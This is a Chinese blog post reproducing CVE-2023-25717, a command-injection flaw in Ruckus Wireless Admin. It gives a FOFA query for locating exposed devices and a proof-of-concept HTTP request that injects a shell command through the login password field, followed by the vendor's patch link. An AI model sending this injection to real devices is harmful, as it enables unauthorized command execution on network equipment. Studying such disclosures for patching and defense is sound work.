Ruckus Wireless Admin 命令执行漏洞复现(CVE-2023-25717)

已于 2023-12-21 18:56:49 修改
阅读量1.1k 收藏 12
点赞数 12
分类专栏: 漏洞复现 文章标签: 安全 web安全
于 2023-12-21 16:28:46 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41904294/article/details/135133509
版权

0x01 产品简介

Ruckus Wireless Admin是ruckuswireless多个路由、硬件设备的后台管理系统。

0x02 漏洞概述

Ruckus Wireless Admin在10.4 及更早版本存在命令执行漏洞。攻击者可通过该漏洞在服务器端任意执行代码,写入后门,获取服务器权限,进而控制整个web服务器。

0x03 复现环境

FOFA:app="Ruckus-Wireless"

bcc1c2c8ad6c4c209a1ff442e5807af5.png

0x04 漏洞复现

PoC

GET /forms/doLogin?login_username=admin&password=password$(ping+dnslog)&x=0&y=0 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Accept-Encoding: gzip
Connection: close

dnslog验证

6363615f9e744c85b5632352a2e8e180.png

2831dc48fded400fb14eb54c649b96ca.png0x05 修复建议

厂商已发布了漏洞修复程序,请及时关注更新:https://support.ruckuswireless.com/security_bulletins/315

 

 

0xSecl
关注
  • 12
    点赞
  • 12
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
订阅专栏
CVE-2023-25717:Ruckus Wireless Admin 命令执行漏洞 [附POC]
薛定谔嘚喵博客
12-25 832
Ruckus Wireless Adminruckuswireless的多个路由器和硬件设备的后台管理系统。Ruckus Wireless Admin版本10.4及更早版本存在命令执行漏洞
CISA提醒:严重的 Ruckus 漏洞被用于感染 WiFi 接入点
smellycat000的专栏
05-15 637
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士美国网络安全和基础设施安全局 (CISA) 提醒称,Ruckus Wireless Admin 面板中存在一个严重的远程代码执行漏洞 (CVE-2023-25717),已遭近期发的某 DDoS 僵尸网络利用。虽然该漏洞已在2月初修,但很多设备所有人可能尚未修无线接入点。另外,目前尚未发布针对已达生命周期型号设备的补丁。攻击者正通过 Ando...
2023.3.17 | Goby红队版可利用漏洞更新
m0_46699477的博客
03-17 8629
Nacos 身份认证绕过、泛微OA SQL注入、任意文件读取CVE-2023-26256、任意文件上传CVE-2022-39952、 天融信任意文件下载、命令执行漏洞、代码执行CVE-2022-27596、 路径穿越CVE-2022-48253、CVE-2023-25717、Aspera 远程代码执行CVE-2022-47986、SolarView Compact 、CVE-2023-23333、未授权访问、CVE-2022-31474、TurboMail文件读取、Apache默认密码....
WuThreat身份安全云-TVD每日漏洞情报-2023-02-15
wuthreat无胁科技的博客
02-15 469
参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?参考链接:https://tvd.wuthreat.com/#/listDetail?漏洞编号:CVE-2023-24276,CNNVD-202302-367。
怎样配置Ruckus AP
热门推荐
然后呢
12-20 5万+
在网上能够找到的 PDF 版本的 Ruckus ZoneFlex AP操作指导 或者 PPT 版本的 Ruckus 胖 AP 配置方法 都是本人所作,今天发竟然被抄袭了。不过本来也没什么技术含量,算了。这个手册算是它的升级版本。操作前的准备认识硬件LED状态灯 我们拿一台 Ruckus 2942 AP 来讲解。这个型号已经停产,而且是单频 2.4GHz AP,但是 LED 灯的状态和含义都是相同
Ruckus 无线路由器被曝多个严重漏洞
smellycat000的专栏
01-03 1279
聚焦源代码安全,网罗国内外最新资讯!编译:奇安信代码卫士团队在2019年12月27日至30日举行的德国36C3大会上,HCL AppScan 旗下Aleph Research 组织的研究...
Ruckus-胖AP配置方法.pptx
03-19
### Ruckus 胖AP配置详解 #### 一、概述 Ruckus 胖AP配置是一项重要的网络管理工作,涉及到无线局域网的基础架构搭建与优化。胖AP相较于瘦AP,具有更强的独立工作能力,它能独立完成大部分网络管理功能,包括但不...
优科 ruckus zf7341-U固件!
05-12
优科 ruckus zf7341-U固件!
积分java源码-Rover-Ruckus-2018-2019:Rover-Ruckus-2018-2019
06-06
积分java源码欢迎! 此 GitHub 存储库包含用于构建 Android 应用程序以控制FIRST Tech Challenge 竞赛机器人的源代码。 要使用此 SDK,请将整个项目下载/克隆到本地计算机。 如果您不熟悉 FIRST ....t
极速下载!青苹果系统Win7旗舰版:稳定安全!
lihuiyun184291的博客
07-25 427
今天系统之家小编给大家带来了青苹果系统Win7旗舰版镜像,该版本系统离线制作而成,安全无病毒,还升级了防火墙功能,大家安装后时刻都能放心操作。同时,它是在保持原有的功能并适度优化,保留下来的功能轻松满足大家的使用需求,系统稳定性也很高,运作顺畅不卡顿。
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 496
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
2024安全大模型技术与市场研究报告
cybtec的博客
07-25 465
2024安全大模型技术与市场研究报告
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1166
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
保障企业数据主权:安全可控的爬虫工具与管理平台
最新发布
zhou6343178的博客
07-25 694
在数据驱动的时代,企业对数据的需求日益增长,但如何在保障数据主权的前提下高效采集数据?本文深入探讨了选择安全可控爬虫工具与管理平台的重要性,分析了关键特性,并提出实用建议,助力企业维护数据安全,实数据价值最大化。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1189
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
数据库安全:MySQL安全配置,MySQL安全基线检查加固
wangyuxiang946的博客
07-23 2328
MySQL基线检查,基线配置,安全加固
UNII-3有那些ap设备
04-22
很抱歉,我不知道您对UNII-3的AP设备有何要求,因为我不会记住您之前说过的话。但是我可以尝试回答您的问题,UNII-3是指美国无线电频谱管制委员会(FCC)规定的一组高频段Wi-Fi频道,它的频率范围是5.725-5.825 GHz,因此能够使用此频段的AP设备都可以支持UNII-3频道。一些常见的UNII-3频段支持的AP设备可以是:Cisco Aironet 1530 Series Outdoor Access Points、Aruba Networks AP-228 802.11ac Outdoor Access Point、Ruckus ZoneFlex™ T301n Outdoor Access Point、Ubiquiti UniFi UAP-AC-Outdoor等。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

0xSecl

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值